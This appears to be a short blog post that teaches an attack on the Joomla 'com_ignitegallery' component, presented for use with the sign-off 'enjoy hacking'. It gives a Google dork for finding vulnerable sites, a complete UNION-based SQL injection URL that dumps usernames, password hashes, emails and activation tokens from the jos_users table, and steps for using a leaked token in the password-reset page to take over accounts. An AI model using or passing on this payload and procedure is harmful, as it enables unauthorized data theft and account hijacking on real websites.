Vulnerable on "com_ignitegallery"
Here the steps :
Happy trying and enjoy hacking. :)
- Find target on Google using this dork --> inurl:index.php?option=com_ignitegallery
Example --> http://target.com/index.php?option=com_ignitegallery&Itemid=57 - Make some adjustment and put the red-long-url at the back of the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
Example --> http://target/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users-- - Focus on the change -->
target:89143e2af0df46bd73034bba7caf27e4:OqGo1BDqKhOz7nPI18Xf3JSILKwsEe9s:target@gmail.com: - Make another adjustment on the url again and put this --> ?option=com_user&view=reset
Example --> http://target.com/index.php?option=com_user&view=reset - Insert the target's email
Example --> target@gmail.com - Open new tab on the browser, make adjustment on the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
Example --> http://target.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users-- - Insert the target's token Example --> 89143e2af0df46bd73034bba7caf27e4
** Where you find the token? follow the colour that i have matched above.
Happy trying and enjoy hacking. :)

Post a Comment